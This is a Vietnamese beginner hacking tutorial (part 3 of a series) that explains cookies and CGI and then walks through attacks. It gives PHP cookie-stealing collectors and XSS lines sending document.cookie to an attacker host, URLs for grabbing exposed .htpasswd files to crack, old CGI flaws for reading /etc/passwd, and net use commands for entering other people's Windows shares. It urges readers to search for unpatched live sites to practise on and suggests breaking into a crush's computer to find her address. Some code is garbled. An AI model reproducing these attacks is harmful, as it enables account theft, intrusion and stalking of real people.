Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 3

20. Cookie là gì

Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site và browser của người dùng. Cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site.

Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen... Cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, không phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điều khiển site.

Cookies thường có các thành phần sau:

+ Tên: do người lập trình web site chọn
+ Domain: là tên miền từ server mà cookie được tạo và gửi đi
+ Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
+ Ngày hết hạn: là thời điểm mà cookie hết hiệu lực.
+ Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
+ Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

(Tài liệu của Viethacker.net)

21. Kỹ thuật lấy cắp cookie của nạn nhân

Trước hết, các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó:

CODE 
<?php 
define ("LINE", "\r\n"); 
define ("HTML_LINE", "
"); 
function getvars($arr, $title) 
{ 
$res = ""; 
$len = count($arr); 
if ($len > 0) 
{ 
if (strlen($title) > 0) 
{ 
print("[--------$title--------]" . HTML_LINE); 
$res .= "[--------$title--------]" . LINE; 
} 
foreach ($arr as $key = > $value) 
{ 
print("[$key]" . HTML_LINE); 
print($arr[$key] . HTML_LINE); 
$res .= "[$key]" . LINE . $arr[$key] . LINE; 
} 
} 
return $res; 
} 
// get current date 
$now = date("Y-m-d H:i:s"); 
// init 
$myData = "[-----$now-----]" . LINE; 
// get 
$myData .= getvars($HTTP_GET_VARS, ""); 
// file 
$file = $REMOTE_ADDR . ".txt"; 
$mode = "r+"; 
if (!file_exists($file)) 
$mode = "w+"; 
$fp = fopen ($file, $mode); 
fseek($fp, 0, SEEK_END); 
fwrite($fp, $myData); 
fclose($fp); 
? >

hoặc

CODE 
<?php 
if ($contents && $header){ 
mail("victim@yahoo.com" , "from mail script",$contents,$header) or 
die('couldnt email it'); 
sleep(2); 
? > 
<script language=javascript > 


<?php 
} else { 
echo "nope"; 
}

(Bạn hãy sửa cái victim@yahoo.com thành địa chỉ Mail của bạn).

Bạn hãy save cái notepad này với tên “<tên tuỳ các bạn>.php” (Nhớ là phải có .php) rồi upload lên một host nào đó có hỗ trợ PHP, trong VD của tôi là abc.php (đối với các bạn đã từng làm Web chắc sẽ rất dễ phải không?). Đoạn mã này sẽ có nhiệm vụ ăn cắp thông tin (và có khi có cả cookie) của nạn nhân khi họ mở dữ liệu có chứa đoạn mã này rồI tự động save thông tin đó thành file < ip của nạn nhân > .txt.

Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng chưa fix, khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình:

CODE 
document.write(` `) 

với host_php: là địa chỉ bạn đã upload file ăn cắp cookie đó lên và abc.php là file VD của tôi.

Ví dụ: khi áp dụng trong tag img, ta dùng như sau:

CODE 
 ')\">

hoặc:

[CODE 
img]javascript: Document.write('&#x3cimg src=http://host_php/docs.php?docs='+escape(document .cookie)+'&#x3e')\">

Bạn có thể tìm những trang web để thực hành thử cách trong VD này bằng cách vào google.com tìm những forum bị lỗi này bằng từ khoá "Powered by …….. forum" với những forum sau: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. Nếu các bạn may mắn các bạn có thể tìm thấy những forum chưa fix lỗi này mà thực hành, ai tìm được thì chia sẽ với mọi người nhé.

Còn nhiều đoạn mã ăn cắp cookie cũng hay lắm, các bạn hãy tự mình tìm thêm.

22. Cách ngắt mật khẩu bảo vệ Website

Khi các bạn tới tìm kiếm thông tin trên một trang Web nào đó, có một số chỗ trên trang Web đó khi bạn vào sẽ bị chặn lại và sẽ xuất hiện một box yêu cầu nhập mật khẩu, đây chính là khu vực riêng tư cất dấu những thông tin mật chỉ dành cho số người hoặc một nhóm người nào đó (Nơi cất đồ nghề hack của viethacker.net mà báo e-chip đã nói tới chẳng hạn). Khi ta click vào cái link đó thì (thông thường) nó sẽ gọi tới .htpasswd và .htaccess nằm ở cùng trong thư mục bảo vệ trang Web. Tại sao phải dùng dấu chấm ở trước trong tên file '.htaccess'? Các file có tên bắt đầu là một dấu chấm '.' sẽ được các web servers xem như là các file cấu hình. Các file này sẽ bị ẩn đi (hidden) khi bạn xem qua thư mục đã được bảo vệ bằng file .htaccess. Hai hồ sơ này có nhiệm vụ điều khiển sự truy nhập tới cái link an toàn mà bạn muốn xâm nhập đó. Một cái quản lý mật khẩu và user name, một cái quản lý công việc mã hoá những thông tin cho file kia. Khi bạn nhập đúng cả 2 thì cái link đó mới mở ra. Bạn hãy nhìn VD sau:

CODE
Graham:F#.DG*m38d%RF 
Webmaster:GJA54j.3g9#$@f

Username bạn có thể đọc được rùi, còn cái pass bạn nhìn có hiểu mô tê gì không? Dĩ nhiên là không rồi. bạn có hiểu vì sao không mà bạn không thể đọc được chúng không? cái này nó có sự can thiệp của thằng file .htaccess. Do khi cùng ở trong cùng thư mục chúng có tác động qua lại để bảo vệ lẫn nhau nên chúng ta cũng không dại gì mà cố gắng đột nhập rồi crack mớ mật khẩu chết tiệt đó (khi chưa có đồ nghề crack mật khẩu trong tay. Tôi cũng đang nghiên cứu để có thể xâm nhập trực tiếp, nếu thành công tôi sẽ post lên cho các bạn). Lỗi là ở đây, chuyện gì sẽ xảy ra nếu cái .htpasswd nằm ngoài thư mục bảo vệ có file .htaccess? Ta sẽ chôm được nó dễ dàng, bạn hãy xem link VD sau:

http://www.company.com/cgi-bin/pro tected/

hãy kiểm tra xem file .htpasswd có được bảo vệ bởI .htaccess hay không, ta nhập URL sau:

http://www.company.com/cgi-bin/pro tected/.htpasswd

Nếu bạn thấy có câu trả lờI 'File not found' hoặc tương tự thì chắc chắn file này đã không được bảo vệ, bạn hãy tìm ra nó bằng một trong các URL sau:

http://www.company.com/.htpasswd</ a>
http://www.company.com/cgi-bin/.ht passwd
http://www.company.com/cgi-bin/pas swords/.htpasswd
http://www.company.com/cgi-bin/pas swd/.htpasswd

Nếu vẫn không thấy thì các bạn hãy cố tìm bằng các URL khác tương tự (có thể nó nằm ngay ở thư mục gốc đấy), cho đến khi nào các bạn tìm thấy thì thôi nhé.

Khi tìm thấy file này rồi, bạn hãy dùng chương trình "John the ripper" hoặc "Crackerjack", để crack passwd cất trong đó. Công việc tiếp theo hẳn các bạn đã biết là mình phải làm gì rồi, lấy user name và passwd hợp lệ đột nhập vào rùi xem thử mấy cô cậu “tâm sự” những gì trong đó, nhưng các bạn cũng đừng có đổi pass của họ hay quậy họ nhé.

Cách này các bạn cũng có thể áp dụng để lấy pass của admin vì hầu hết những thành viên trong nhóm kín đều là “có chức có quyền” cả.

23. Tìm hiểu về CGI

CGI là từ viết tắt của Common Gateway Interface, đa số các Website đều đang sử dụng chương trình CGI ( được gọI là CGI script ) để thực hiện những công việc cần thiết 24 giờ hằng ngày. Những nguyên bản CGI script thực chất là những chương trình được viết và được upload lên trang Web vớI những ngôn ngữ chủ yếu là Perl, C, C++, Vbscript trong đó Perl được ưa chuộng nhất vì sự dễ dàng trong việc viết chương trình, chiếm một dung lượng ít và nhất là nó có thể chạy liên tục trong 24 giờ trong ngày.

Thông thường, CGI script được cất trong thư mục /cgi-bin/ trên trang Web như VD sau:

http://www.company.com/cgi-bin/log in.cgi

Với những công việc cụ thể như:
+ Tạo ra chương trình đếm số người đã ghé thăm.
+ Cho phép những ngườI khách làm những gì và không thể làm những gì trên Website của bạn.
+ Quản lý user name và passwd của thành viên.
+ Cung cấp dịch vụ Mail.
+ Cung cấp những trang liên kết và thực hiện tin nhắn qua lại giữa các thành viên.
+ Cung cấp những thông báo lỗi chi tiết .v.v…..

24. Cách hack Web cơ bản nhất thông qua CGI script

Lỗi thứ 1: lỗi nph-test-cgi

+ Đánh tên trang Web bị lỗi vào trong trình duyệt của bạn.
+ Đánh dòng sau vào cuốI cùng: /cgi-bin/nph-test-cgi
+ Lúc đó trên URL bạn sẽ nhìn giống như thế này:

http://www.servername.com/cgi-bin/ nph-test-cgi

+ Nếu thành công bạn sẽ thấy các thư mục được cất bên trong . Để xem thư mục nào bạn đánh tiếp:

?<tên /> /*

+ file chứa passwd thường được cất trong thư mục /etc , bạn hãy đánh trên URL dòng sau:

http://www.servername.com/cgi-bin/ nph-test-cgi?/etc/*

Lỗi thứ 2: lỗi php.cgi

+ Tương tự trên bạn chỉ cần đánh trên URL dòng sau để lấy pass:

http://www.servername.com/cgi-bin/ php.cgi?/etc/passwd

Quan trọng là đây là những lỗi đã cũ nên việc tìm các trang Web để các bạn thực hành rất khó, các bạn hãy vào trang google.com rồi đánh từ khoá:

/cgi-bin/php.cgi?/etc/passwd]
hoặc cgi-bin/nph-test-cgi?/etc

Sau đó các bạn hãy tìm trên đó xem thử trang nào chưa fix lỗi để thực hành nhé.

25. Kỹ thuật xâm nhập máy tính đang online

Xâm nhập máy tính đang online là một kỹ thuật vừa dễ lạI vừa khó. Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách đáng kể và những máy họ không share thì không thể xâm nhập được, do đó nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account, có một cách êm thấm hơn, ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân không share là dùng chương trình DOS để tấn công. Ok, ta sẽ bắt đầu:

Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu.

Vào Start == > Run gõ lệnh cmd.

Trong cửa sổ DOS hãy đánh lệnh “net view ”

CODE

+ VD: c:\net view 203.162.30.xx

Bạn hãy nhìn kết quả, nếu nó có share thì dễ quá, bạn chỉ cần đánh tiếp lệnh

net use <ổ đĩa bất kỳ trên máy của bạn >: <ổ share của nạn nhân >

+ VD: c:\net use E: 203.162.30.xxC

Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy download chương trình dò passwd về sử dụng (theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT). Chú ý là về cách sử dụng thì hai chương trình tương tự nhau, dòng đầu ta đánh IP của nạn nhân, dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý, trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000.

Nếu máy của nạn nhân không có share thì ta đánh lệnh:

net use <ổ đĩa bất kỳ trên máy của bạn >: c$ (hoặc d$)"administrator"

+ VD: net use E: 203.162.30.xxC$"administrator"

Kiểu chia sẻ bằng c$ là mặc định đối với tất cả các máy USER là "administrator".

Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình “thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ của cô nàng (với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi tìm được địa chỉ đó). Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh:

c:\netstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass với cô ta thôi, nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP của cô ta. Sau đó bạn dùng cách xâm nhập mà tôi đã nói ở trên. (Có lẽ anh chàng tykhung của chúng ta hồi xưa khi tán tỉnh cô bạn ở xa qua mạng cũng dùng cách này để đột nhập và tìm hiểu địa chỉ của cô ta đây mà, hi`hi`.)

Bạn sẽ thành công nếu máy của nạn nhân không cài firewall hay proxy.

=================================================== =
Nhiều bạn có yêu cầu tôi đưa ra địa chỉ chính xác cho các bạn thực tập, nhưng tôi không thể đưa ra được vì rút kinh nghiệm những bài hướng dẫn có địa chỉ chính xác, khi các bạn thực hành xong đoạt được quyền admin có bạn đã xoá cái database của họ. Như vậy HVA sẽ mang tiếng là nơi bắt nguồn cho sự phá hoại trên mạng. Mong các bạn thông cảm, nếu có thể thì tôi chỉ nêu những cách thức để các bạn tìm những địa chỉ bị lỗi đó chứ không đưa ra địa chỉ cụ thể nào.
=================================================== =

Ở phần 4 tôi sẽ đề cập đến kỹ thuật chống xâm nhập vào máy tính của mình khi bạn online, tìm hiểu sơ các bước khi ta quyết định hack một trang Web, kỹ thuật tìm ra lỗi trang Web để thực hành, kỹ thuật hack Web thông qua lỗi Gallery…

GOOKLUCK!!!!!!!!!

Thứ Hai, 15/03/2021 15:24
4,411 👨 20.612
0 Bình luận
Sắp xếp theo